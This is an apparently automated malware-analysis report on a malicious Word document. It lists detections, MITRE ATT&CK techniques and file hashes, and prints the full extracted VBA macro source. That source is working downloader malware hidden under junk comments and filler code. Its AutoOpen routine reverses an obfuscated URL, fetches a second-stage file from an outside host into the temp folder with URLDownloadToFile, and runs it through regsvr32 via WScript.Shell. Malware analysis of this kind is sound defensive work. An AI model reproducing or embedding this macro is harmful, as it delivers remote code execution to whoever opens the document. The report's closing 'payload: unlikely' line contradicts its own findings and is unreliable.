Verdict: MALICIOUS
Risk Score: 378
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1105 Ingress Tool Transfer
- T1218.011 System Binary Proxy Execution: Rundll32
The sample is a malicious OOXML document containing VBA macros. Its AutoOpen macro runs a payload that calls URLDownloadToFile to fetch a second-stage artifact from a remote location. The script also calls WScript.Shell.Exec, indicating a likely attempt to execute the downloaded payload, possibly through a LOLBin.
Heuristics (9)
- ClamAV: Doc.Malware.Generic-7898874-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Generic-7898874-0
- VBA project inside OOXML [medium, OOXML_VBA, 6 related findings]: Document contains a VBA project; VBA macros present
- URLDownloadToFile in VBA [critical, OLE_VBA_DOWNLOAD]: URLDownloadToFile in VBA. Matched line in script: `#If VBA7 And Win64 Then Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" ( _`
- LOLBin reference in VBA [critical, OLE_VBA_LOLBIN]: LOLBin reference in VBA. Matched line in script: `' Palestine deferred Call zD.K("regsvr32 " + gp) bL = Hex(258)`
- VBA URLDownloadToFile reversed-LOLBin launcher [critical, OLE_VBA_URLDOWNLOAD_REVERSED_LOLBIN]: VBA auto-exec macro downloads a payload with URLDownloadToFile and launches it through WScript.Shell.Exec using a reversed command string. This is a high-confidence downloader/launcher pattern, not an Office parser CVE. Matched line in script: `#If VBA7 And Win64 Then Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" ( _`
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script: `End Enum Sub AutoOpen() gu = Abs(46)`
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]: Environ() call (env variable access). Matched line in script: `' Prophet waitress silica voted kT = Environ(NO) End Function`
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Extracted URLs (each referenced by macro):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#
  - http://ns.adobe.com/photoshop/1.0/
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4889 bytes | 78749797efcae284dedd849684a3b647f6269a9e067758c93abe541db8a3e397 |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "q"
Function V(Qh)
Eh = Abs(-14)
' Leads
Dim T7
T7 = DateSerial(2006, 8, 8)
' Newfoundland sanitary wheaten jess earliest
yF = Hex(387)
E = Abs(2)
' Saucy disagreed birthplace nieces
End Function
Function G()
B = Fix(41)
Dim sJ
sJ = 4 * Atn(1)
' Most
C3 = Fix(-19)
l = Fix(23)
DV = Fix(-67)
uD = Fix(51)
' Oral leaf fees arable
Z = Hex(83)
' Woolen coupled
' Campus parish temp trumpery teacup scalp
Dim M
M = DateSerial(2006, 11, 10)
Dim qi, a1
qi = 4
a1 = 4 / Cos(qi)
Rw = Abs(-48)
' Attica
Dim RC
RC = 4 * Atn(1)
p7 = Hex(272)
' Convulsive aaron lintel kitchen
Dim O0
O0 = DateSerial(2003, 5, 5)
' Quartette sulphurous
Dim yk
yk = 4 * Atn(1)
' Edgar paired results
' Bringing spot md situations hour
SI = Hex(437)
FQ = Abs(-80)
' Playwright ridge laziness differ harangue postal
P = Fix(14)
' Neptune rapping
' Thyme ut furlong
' Oxfordshire transgressor lloyd fisheries mistress
' Aristocrat
' Sucks
TP = Abs(-24)
' Bilateral karaoke negotiation suffer
s = Abs(46)
' Drawback fauna bottomless facilitating deposition tit
fe = Fix(18)
Y0 = Hex(95)
' Spank conciliate
It = Fix(66)
' Zest paraffin chattel
Dim bZ
bZ = DateSerial(2009, 9, 17)
WJ = Abs(21)
Dim f
f = DateSerial(2008, 3, 25)
End Function
Public Enum j
uz = 1
End Enum
Sub AutoOpen()
gu = Abs(46)
Th = Abs(-19)
' Transit come
Dim yn, Ne
yn = 1
Ne = 1 / Cos(yn)
' So-and-so shopping membrane trust pumps in
Dim YH
YH = DateSerial(2019, 6, 12)
' Gas frontal bali ethernet rental
' Rosebud extraction fulfill
XO = Abs(-25)
' Trackless capitulate hosts harmed plastered
Dim N1, D
N1 = 1
D = 1 / Cos(N1)
' Cole informal length disposition situation pleasant
qS = Abs(-51)
' Bellies webb
' Active robust trend allocation
Dim zD As New Os
u3 = Hex(215)
Dim zK
zK = DateSerial(2002, 1, 2)
' Centaur insuperable protecting uncultivated clustered darwin draughts
gp = zD.kT("tmp") & "\HV.tmp"
vP = Fix(-49)
' Nondescript resonance melissa caused
' Thumbzilla save mp regime
' Fc consumer aides advocacy developers desert
ov = Abs(-57)
Ua = Abs(-67)
zD.y "bac.9kon=l?php.p23i0oia/58ol02ew/moc.8fjjfbb//:ptth", gp
cn = Fix(22)
' Storehouse devon parcel eva
Dim CG
CG = DateSerial(2000, 3, 16)
' Beneficial solvent touchstone character
Gv = Hex(439)
' Vicarage holes beings talented
Dim t
t = DateSerial(2001, 10, 13)
' Alto commitment participation below
Dim xb
xb = 4 * Atn(1)
' Palestine deferred
Call zD.K("regsvr32 " + gp)
bL = Hex(258)
' Occasional chauffeur
Dim rA, AA
rA = 7
AA = 7 / Cos(rA)
' Attention
OK = Hex(359)
End Sub
Attribute VB_Name = "Os"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If VBA7 And Win64 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As LongPtr, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As LongPtr, _
ByVal lpfnCB As LongPtr _
) As Long
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long _
) As Long
#End If
Private Sub Class_Initialize()
Dim a
a = 4 * Atn(1)
Dim sZ
sZ = 4 * Atn(1)
' Thinker emma matrix carbonic
Dim Qw
Qw = DateSerial(2009, 10, 10)
' Dressing illiterate
Dim lM
lM = DateSerial(2016, 10, 29)
' Clean
End Sub
Private Sub Class_Terminate()
' Loathe
' Hopefully protectorate statuesque negotiations fish
VL = Abs(36)
' Region northamptonshire dump
End Sub
Public Function y(c5, EE)
ux = Abs(-31)
' Simplified rugby miscreant blades sallow
mh = Fix(2)
Dim My
My = DateSerial(2020, 5, 16)
' Agone
U = URLDownloadToFile(0&, StrReverse(c5), EE, 0&, 0&)
End Function
Public Function kT(NO)
Dim sC
sC = DateSerial(2003, 8, 16)
' Restrict warily clock bugle died
' Dislodge mesh viii
' Squint star hottentot
' Cancel webcam id cherub
fx = Hex(465)
' Prophet waitress silica voted
kT = Environ(NO)
End Function
Public Sub K(EE)
Dim sf, f6
sf = 3
f6 = 3 / Cos(sf)
' Webcams smooth iraqi saucy manitoba
' Undeserving rake terminology peaked pyrenees
' Brown transitive painstaking flog installed
SU = Abs(-54)
' Pam sonic
' Lucknow lengthen
Dim iH As New WshShell
iH.exec EE
End Sub

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 27136 bytes | 1152983e3c835bdf150a50ea05e9f144e7bc4403be4f8544daa06ac054e2c79a |
Detection
- ClamAV: Doc.Malware.Generic-7898874-0
- Obfuscation or payload: unlikely